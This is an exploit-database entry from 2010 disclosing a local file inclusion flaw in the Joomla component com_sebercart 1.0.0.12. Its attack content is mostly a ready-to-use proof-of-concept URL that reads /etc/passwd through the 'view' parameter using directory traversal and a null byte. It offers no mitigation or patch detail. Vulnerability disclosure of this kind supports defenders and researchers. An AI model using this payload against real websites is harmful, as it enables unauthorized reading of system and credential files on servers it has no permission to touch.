id: 11655
date: 04/06/2010
title: Joomla Component Saber Cart com_sebercart Local File Inclusion
author: AntiSecurity
cves: 

============================================================================
Joomla Component Saber Cart com_sebercart Local File Inclusion Vulnerability
============================================================================

=========================================================================================================
 
 
  [o] Joomla Component Saber Cart Local File Inclusion Vulnerability
  
       Software : com_sebercart version 1.0.0.12
       Vendor   : http://www.seber.com.au/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=========================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_sebercart&view=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
 
 
=========================================================================================================



#  0day.today [2023-03-25]  #